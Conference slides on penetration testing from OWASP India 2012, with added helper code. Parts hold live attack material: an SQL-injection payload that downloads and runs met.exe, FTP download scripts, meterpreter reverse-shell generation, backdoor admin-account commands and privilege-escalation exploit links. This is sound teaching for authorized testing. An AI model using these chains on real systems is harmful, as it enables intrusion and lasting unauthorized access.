Public exploit held private : Penetration Testing the researcher’s way

This talk is about how to solve the practical challenges faced during pen-testing and exploitation, how to do it efficiently, and the tips and tricks that help along the way. It tries to answer common questions like:

0. How do I prepare? What kind of tools should I have?
1. How do I scan the entire network faster?
2. How can I get more accurate scanning and fingerprinting results?
3. Nessus says it is vulnerable, but how can I exploit it?
4. What if I know it is vulnerable but no exploit is available?
5. I am inside the box and have compromised it; now what do I do?

In short, it will show you the pain points of a typical pen-testing exercise, how to deal with them, and will help you reach “42”, the answer to life, the universe and everything.

    Presentation Transcript

    • OWASP InfoSec India Conference 2012, August 24th – 25th, 2012. The OWASP Foundation, Hotel Crowne Plaza, Gurgaon. http://www.owasp.org http://www.owasp.in
      Public exploit held private : Penetration Testing the researcher’s way
      Tamaghna Basu, GCIH, OSCP, RHCE, CEH, ECSA, tamaghna.basu@gmail.com
      OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
    • DISCLAIMER! This presentation contains materials on the evolution of a pen tester which are solely based on the perspective of the speaker, which might contradict the opinions of individuals. All the scenarios explained here are fictional even though they might resemble realistic situations. Even though no harm is intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that.
    • Setting the context
      - Why pentesting?
      - How do you do it? To VA or to PT… that’s the question.
    • Setting the context: terminologies
      - Vulnerability
      - Exploit
      - Payload
      - Reverse shell
    • Basics: pentesting
      - Internal
      - External
      - Automated -> review the report -> get the final report
      - Manual -> run a few basic tools -> get the report done
    • Basics… pentesting steps
      - Recon and scanning
      - Exploit
      - Maintain access
      - Clean up
    • Scanning: why?
      - Identify the live hosts
      - OS fingerprinting
      - Service fingerprinting
    • Scanning
      - Desi Jugaad: ping sweep / shell scripts
      - Decent tools (but indecent usage): NMAP (behold the power of NSE); others?
    • Desi Jugaad (Local Hack): ping sweep
      Windows (typed at the cmd prompt; inside a .bat file write %%i instead of %i):
        FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply"
      Linux:
        #!/bin/bash
        for ip in $(seq 1 254); do
          ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 &
        done
      Caveat: on Windows, a host that is down on the local subnet answers with "Reply from <your own address>: Destination host unreachable.", which find "Reply" also matches; matching on "TTL=" instead keeps only real answers. The Linux pipeline cuts the address out of the "64 bytes from 192.168.15.x:" line, and the trailing & runs the pings in parallel so the sweep finishes in seconds.
    • ScanningProblem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
    • Desi Jugaad Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
    • Nmap scripts: /usr/local/share/nmap/scripts (the slide's "/usr/locale/..." is a typo; distribution packages usually install them under /usr/share/nmap/scripts)
    • Nmap scripts
      - Shared files and folders: nmap --script=smb-enum-shares 192.168.80.129
      - Check for SMB vulnerabilities: nmap --script=smb-check-vulns 192.168.80.129 (later Nmap releases removed smb-check-vulns in favour of the individual smb-vuln-* scripts, for example smb-vuln-ms08-067)
      - Scan for machines that use the default MS SQL username/password: nmap --script=ms-sql-info 192.168.80.129 (ms-sql-info only reports instance and version information; to test for blank or default sa passwords use ms-sql-empty-password or ms-sql-brute)
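The usual next step after the -sV and NSE scans above is to turn nmap's output into a target list. As an added example (not from the slides), the Python below parses nmap's XML output (-oX): it keeps only live hosts and open ports, carries the service version and nmap's own 0-10 confidence value for each match, and flags low-confidence matches, which came from the port-number table rather than a banner probe and deserve a manual check before an exploit is picked for them. SAMPLE_NMAP_XML is a constructed sample in the shape nmap writes; the hosts, ports and versions in it are made up.

```python
"""Turn nmap -oX output into a target list: live hosts, open ports,
service versions and nmap's own confidence in each match.
Added example, not from the slides. SAMPLE_NMAP_XML is a constructed
sample in the shape `nmap -sV -O -oX scan.xml <target>` writes; the
hosts, ports and versions in it are made up."""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.168.15.0/24">
  <host><status state="up" reason="echo-reply"/>
    <address addr="192.168.15.201" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.8" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/>
        <service name="microsoft-ds" method="table" conf="3"/></port>
      <port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
        <service name="http-proxy" method="table" conf="3"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.9 - 2.6.33" accuracy="96"/></os>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.168.15.202" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """One dict per open port on every host nmap marked as up.

    Filtered/closed ports are dropped so they do not pollute the target
    list. "confident" is True only when nmap's conf attribute is 10,
    i.e. the service was identified from a probe response, not guessed
    from the port number."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        osmatch = host.find("os/osmatch")
        os_guess = osmatch.get("name") if osmatch is not None else ""
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            rows.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": get("name"),
                "product": get("product"),
                "version": get("version"),
                "confident": get("conf") == "10",
                "os": os_guess,
            })
    return rows


def live_hosts(rows):
    """Sorted list of addresses that had at least one open port."""
    return sorted({r["host"] for r in rows})


def needs_manual_check(rows):
    """Rows whose service match came from the port table, not a probe."""
    return [r for r in rows if not r["confident"]]


def main():
    for r in parse_nmap_xml(SAMPLE_NMAP_XML):
        flag = "" if r["confident"] else "   <- low confidence, verify by hand"
        print(f'{r["host"]}:{r["port"]}/{r["proto"]} {r["service"]} '
              f'{r["product"]} {r["version"]} [{r["os"]}]{flag}')


if __name__ == "__main__":
    main()
```

Run the script on a real file with `parse_nmap_xml(open("scan.xml").read())`; the rows can then be grouped by product/version to decide which exploit to search for first.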
    • ScanningI have Nessus. Why to go through so much pain?I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
    • Exploit Motive  To gain access  Data  Command execution  Destroy everything! Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
    • ExploitWhat to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
    • Exploit FTP  Server Exploit – Buffer Overflow  Fuzzing???  BruteforceSNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
    • FTP tips: Windows (ftp.exe driven non-interactively by a script file)
        echo open 192.168.12.124 > ftp.txt
        echo ftp>> ftp.txt
        echo ftp>> ftp.txt
        echo bin >> ftp.txt
        echo get met2.exe >> ftp.txt
        echo bye >> ftp.txt
        ftp -s:ftp.txt
      (the two "ftp" lines answer the user name and password prompts for anonymous login)
    • FTP tips: Linux
        echo quote user ftp > ftp.txt
        echo quote pass ftp >> ftp.txt
        echo verbose >> ftp.txt
        echo binary >> ftp.txt
        echo get exploit.c >> ftp.txt
        echo bye >> ftp.txt
        cat ftp.txt | ftp -n 192.168.12.124
      (-n disables auto-login, so the credentials are sent with quote user / quote pass; the first line uses > rather than >> so a stale ftp.txt is overwritten instead of appended to)
    • Exploit HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
    • HTTPOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
    • SQLi Tips or 1=1;exec master..xp_cmdshell echo open 192.168.12.124> ftpmet.txt;exec master..xp_cmdshell echo test>> ftpmet.txt;exec master..xp_cmdshell echo test>> ftpmet.txt;exec master..xp_cmdshell echo bin>> ftpmet.txt;exec master..xp_cmdshell echo get met.exe>> ftpmet.txt;exec master..xp_cmdshell echo bye;exec master..xp_cmdshell ftp - s:ftpmet.txt;exec master..xp_cmdshell met.exe;-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
    • SQLi TipsMy SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password -e "SELECT LOAD_FILE(/etc/passwd) INTO dumpfile /tmp/passwd;" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
    • Exploit Metasploit  Use Exploit  Set payload  exploit Any other options?How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
    • L33t love story Exploit’s love letter to the machine  PAYLOAD…Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
    • Payload generator: meterpreter
      - msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O
      - Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
      - Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C
      (msfpayload and msfencode were removed from Metasploit in 2015; msfvenom does the same job, with -p for the payload, -f exe or -f c for the output format, and -b to exclude bad characters)
    • From msf:
        use exploit/multi/handler
        set PAYLOAD windows/meterpreter/reverse_tcp
        set LHOST 192.168.1.40
        set LPORT 80
        show options
        exploit
      (LHOST and LPORT must match the values baked into the payload; the previous slide generated it for 192.168.14.15:4321, so one of the two has to change. LHOST is where the handler listens, so it must be an address of the attacking box that the target can reach.)
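The "Bad characters" item on the payload slide is normally handled in two rounds: send a test string containing every byte value where the shellcode will land and compare it with what the debugger shows, then check the finished shellcode against the bad bytes found. As an added example (not from the slides), the Python below does both; the shellcode in main is a constructed placeholder, not msfpayload output.

```python
"""Bad-character handling for the payload step: the test string sent in
the overflow buffer, the comparison against what the debugger shows in
memory, and a scan of finished shellcode for bytes already known bad.
Added example, not from the slides; the shellcode in main() is a
constructed placeholder, not real msfpayload output."""


def badchar_test_string(exclude=(0x00,)):
    """Every byte value in order, minus the ones already known to be bad.
    Send it where the shellcode will go, then look at the copy in the
    debugger: the first altered byte, or the point where the copy stops,
    is the next bad char. Add it to `exclude` and repeat until the whole
    string survives."""
    return bytes(b for b in range(256) if b not in exclude)


def first_corrupted_offset(sent, observed):
    """Offset of the first byte that differs between what was sent and
    what was read back (a short read counts as corruption at its end),
    or None if the whole string survived."""
    for i, (a, b) in enumerate(zip(sent, observed)):
        if a != b:
            return i
    return len(observed) if len(observed) < len(sent) else None


def next_bad_char(sent, observed):
    """The byte value to add to the exclusion list for the next round."""
    off = first_corrupted_offset(sent, observed)
    return None if off is None else sent[off]


def find_bad_chars(shellcode, bad):
    """(offset, byte) pairs in `shellcode` that collide with `bad`. A
    non-empty result means the payload must be re-encoded with those
    bytes excluded (msfencode -b / msfvenom -b) before it goes in."""
    bad = set(bad)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def hex_escape(data):
    """Render bytes the way the C / Python payload formats show them."""
    return "".join(f"\\x{b:02x}" for b in data)


def main():
    # constructed placeholder bytes, not real msfpayload output
    shellcode = b"\x31\xc0\x50\x68\x0a\x0d\x2f\x73"
    bad = (0x00, 0x0a, 0x0d)
    print(hex_escape(badchar_test_string(bad))[:40], "...")
    print(find_bad_chars(shellcode, bad))


if __name__ == "__main__":
    main()
```

Exclude 0x00 from the start for any string-copy overflow (it terminates the copy), and expect 0x0a and 0x0d to be bad in most text protocols such as FTP, where they end the command line.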
    • ExploitI am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
    • Add user
      Windows shell:
        net user hacker hacker123 /add
        net localgroup administrators hacker /add
      Meterpreter (incognito extension):
        use incognito
        add_user hacker hacker123
        add_localgroup_user Administrators hacker
      RDP enable:
        reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    • Privilege escalation
      - Categories: service level, OS
      - Problem! How can I transfer my exploit there? Netcat, FTP
    • Kernel exploits
      - Linux Kernel <= 2.6.36-rc8: http://www.exploit-db.com/exploits/15285/
      - Linux Kernel 2.4/2.6: http://www.exploit-db.com/exploits/9545/
      - Linux Kernel 2.6: http://www.exploit-db.com/exploits/8478/
      - Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5: http://www.exploit-db.com/exploits/9844/
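Given the uname -r string from the compromised box, which of the ranges on this slide apply? As an added example (not from the slides), the Python below encodes the four ranges exactly as written above, with release candidates ordered before their final release, and returns the matching exploit-db IDs. A match is a starting point, not a verdict: distribution kernels backport fixes without bumping the version number, so confirm against the vendor changelog and test in a lab before running anything on a client machine.

```python
"""Match `uname -r` output against the kernel ranges on the Kernel
Exploits slide. Added example, not from the slides; the IDs are the
exploit-db entries listed there."""
import re


def parse_kernel_version(s):
    """'2.6.32-5-amd64' -> (2, 6, 32, 1, 0); '2.6.36-rc8' -> (2, 6, 36, 0, 8).
    The fourth field orders a release candidate before its final release,
    so 2.6.36-rc8 < 2.6.36 compares the way the slide's ranges expect."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?", s)
    if not m:
        raise ValueError("unrecognised kernel version: " + s)
    major, minor, patch, rc = m.groups()
    patch = int(patch) if patch else 0
    if rc:
        return (int(major), int(minor), patch, 0, int(rc))
    return (int(major), int(minor), patch, 1, 0)


def in_range(v, low, high):
    """Inclusive range check; None means unbounded on that side."""
    return ((low is None or parse_kernel_version(low) <= v) and
            (high is None or v <= parse_kernel_version(high)))


def in_series(v, major, minor):
    return v[0] == major and v[1] == minor


# (exploit-db id, range text as written on the slide, predicate)
KERNEL_EXPLOITS = [
    ("15285", "Linux Kernel <= 2.6.36-rc8",
     lambda v: in_range(v, None, "2.6.36-rc8")),
    ("9545", "Linux Kernel 2.4/2.6",
     lambda v: in_series(v, 2, 4) or in_series(v, 2, 6)),
    ("8478", "Linux Kernel 2.6",
     lambda v: in_series(v, 2, 6)),
    ("9844", "Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5",
     lambda v: in_range(v, "2.4.1", "2.4.37") or in_range(v, "2.6.1", "2.6.32-rc5")),
]


def candidate_exploits(uname_r):
    """exploit-db IDs whose slide range covers this kernel. A hit means
    'worth checking', not 'vulnerable': distro kernels backport patches
    without changing the version string."""
    v = parse_kernel_version(uname_r)
    return [eid for eid, _, pred in KERNEL_EXPLOITS if pred(v)]


def main():
    for k in ("2.6.32-5-amd64", "2.6.36-rc8", "3.2.0-4-amd64"):
        print(k, "->", candidate_exploits(k))


if __name__ == "__main__":
    main()
```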
    • Windows exploits
      - Windows Vista, 7, 2008: http://www.exploit-db.com/exploits/15609/
      - Windows XP, 2003: http://www.exploit-db.com/exploits/18176/
      - Linux + NT priv esc: http://www.exploit-db.com/exploits/9301/
      - Windows XP SP2, SP3: http://www.exploit-db.com/exploits/9301/
    • Pivoting… huh?
      - Why do I need it?
      - How do I do it? nc + port forwarding; SSH tunneling
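The nc + port forwarding option needs netcat on the pivot box. As an added example (not from the slides), here is the same relay in Python for a pivot that has an interpreter but no nc: start_forwarder listens on the pivot and copies each connection to a host only the pivot can reach, in both directions, until either side closes. relay_roundtrip wires an in-process echo server (a constructed stand-in for the internal service) behind the forwarder on 127.0.0.1 so the block runs offline; on a real pivot you would call start_forwarder with the internal host and port and point your tools at the pivot.

```python
"""TCP port forwarder for pivoting: listen on the pivot, relay each
connection to a host the attacker cannot reach directly.
Added example, not from the slides. The echo server is a stand-in for
the internal service so the demo runs offline."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF or error, then tear both down so
    the pump running in the other direction also unblocks."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


def _listener(host, port):
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind((host, port))
    ls.listen(16)
    return ls


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """Bind listen_host:listen_port and relay every client to
    target_host:target_port. Returns (bound_port, stop); stop() closes
    the listener. listen_port 0 lets the OS pick a free port."""
    ls = _listener(listen_host, listen_port)

    def serve():
        while True:
            try:
                client, _ = ls.accept()
            except OSError:
                return  # listener closed by stop()
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
                upstream.settimeout(None)
            except OSError:
                client.close()  # target unreachable: drop this client, keep serving
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ls.getsockname()[1], ls.close


def start_echo_server(host="127.0.0.1"):
    """Demo stand-in for the internal service: echoes everything back."""
    ls = _listener(host, 0)

    def serve():
        while True:
            try:
                c, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(c, c), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ls.getsockname()[1], ls.close


def relay_roundtrip(payload, host="127.0.0.1"):
    """Send `payload` through forwarder -> echo server and return what
    comes back, to show the relay works end to end."""
    echo_port, stop_echo = start_echo_server(host)
    fwd_port, stop_fwd = start_forwarder(host, 0, host, echo_port)
    try:
        with socket.create_connection((host, fwd_port), timeout=5) as c:
            c.sendall(payload)
            got = b""
            while len(got) < len(payload):
                chunk = c.recv(4096)
                if not chunk:
                    break
                got += chunk
        return got
    finally:
        stop_fwd()
        stop_echo()


if __name__ == "__main__":
    print(relay_roundtrip(b"GET / HTTP/1.0\r\n\r\n"))
```

Bind the listener to 127.0.0.1 on the pivot and reach it through an SSH -L tunnel when the pivot's own ports are firewalled or monitored; a listener on 0.0.0.0 is visible to everyone on that segment.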
    • Fuzzing… my favorite, but the last thing I prefer to do on my own
      - Python rocks!
      - Basic
      - Advanced: SEH handler, egg hunting shellcode
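For the "Basic" step the loop is always the same: send growing buffers until the service stops answering, then send a cyclic pattern of that size and read the offset of EIP (or of the SEH record, for the "Advanced" case) from the four bytes the debugger shows. As an added example (not from the slides), the Python below produces the FTP command cases for the first pass and implements the pattern generator and offset finder using the same Aa0Aa1... scheme as Metasploit's pattern_create.rb and pattern_offset.rb.

```python
"""Cyclic pattern and offset finder for the basic fuzzing / overflow
step. Added example, not from the slides."""
import string
import struct


def fuzz_lengths(start=100, step=100, stop=3000):
    """Buffer sizes for the first pass: send 'A' * n for each n until the
    service stops answering, and note the size that killed it."""
    return list(range(start, stop + 1, step))


def ftp_fuzz_cases(command="USER", lengths=None):
    """Request bodies for an FTP command overflow test, one per length."""
    return [command.encode() + b" " + b"A" * n + b"\r\n"
            for n in (lengths or fuzz_lengths())]


def pattern_create(length):
    """Aa0Aa1Aa2...Zz9: every 3-byte window is unique, so any 4 bytes
    found in a register map back to exactly one offset (up to 20280
    bytes, after which the sequence would repeat)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=20280):
    """Offset of `value` in the pattern. Pass the bytes as they sit in
    memory, or the int the debugger shows in EIP / the SEH handler
    field (unpacked little-endian, as on x86). None if not found."""
    needle = struct.pack("<I", value) if isinstance(value, int) else value
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


if __name__ == "__main__":
    print(pattern_create(24))
    print(pattern_offset(0x41326141))  # EIP = 0x41326141 -> offset 6
```

When EIP reads back as 0x41414141 the buffer of plain "A"s was big enough; replace it with pattern_create of the same size, crash again, and feed the new EIP value to pattern_offset to learn how many bytes of padding precede the return address.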
    • Did I miss anything? Questions, perspectives, comments: tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu
    • Thank you